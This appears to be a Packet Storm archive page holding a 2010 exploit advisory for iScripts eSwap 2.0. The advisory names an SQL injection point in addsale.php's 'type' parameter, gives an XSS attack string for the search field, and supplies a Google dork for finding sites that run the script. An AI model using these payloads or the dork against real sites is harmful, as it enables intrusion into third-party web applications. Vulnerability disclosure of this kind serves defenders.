what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iScripts eSwap 2.0 Cross Site Scripting / SQL Injection

iScripts eSwap 2.0 Cross Site Scripting / SQL Injection
Posted Jun 7, 2010
Authored by Sid3 effects

iScripts eSwap version 2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | baf46b80e0e7cb3c33952eb0e9135b6ce87df5729c5b3134026ba1ef4311ffdf

iScripts eSwap 2.0 Cross Site Scripting / SQL Injection

Change Mirror Download
# Title:iScripts eSwap v2.0 sqli and xss vulnerability
# Author: Sid3^effects
# Published: 2010-06-05
# price:$99.95
# email:shell_c99@yahoo.com
# vendor: iScripts
# url : http://www.iscripts.com/eswap/
# google dork : Powered by iScripts eSwap.

############################################################################

ooooo .oooooo. oooooo oooooo oooo

`888' d8P' `Y8b `888. `888. .8'

888 888 `888. .8888. .8'

888 888 `888 .8'`888. .8'

888 888 `888.8' `888.8'

888 `88b ooo `888' `888'

o888o `Y8bood8P' `8' `8'


--------------------------------------------------------------------------------------

#####################Sid3^effects aKa HaRi##################################

#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR

#ShouTZ:kedar,dec0d3r,41.w4r10r

#spl shoutz:LiquidWorm,gunslinger_ :D

#Catch us at www.andhrahackers.com or www.teamicw.in

############################################################################
Description :

iScripts eSwap enables you to create an virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users to swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through Authorize.net , Paypal, 2checkout and Google checkout are supported. Also offline payment methods are supported. The powerful admin section allows you to have multiple categories, sub categories and control every aspects of the business. This exchange platform is the ultimate green business by helping your users to recycle
############################################################################

Sql injection and XSS is found in the eswap script V2.0

Xploit :\m/ sqli \m/


demo url:http://www.iscripts.com/eswap/demo/addsale.php?type=[Sqli]

Xploit: \m/ Xss \m/

XSS is found in search field :D

Attack pattern : '"--><script>alert(0x000872)</script>

demo url :http://www.iscripts.com/eswap/demo/search.php

############################################################################

#Sid3^effects








Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close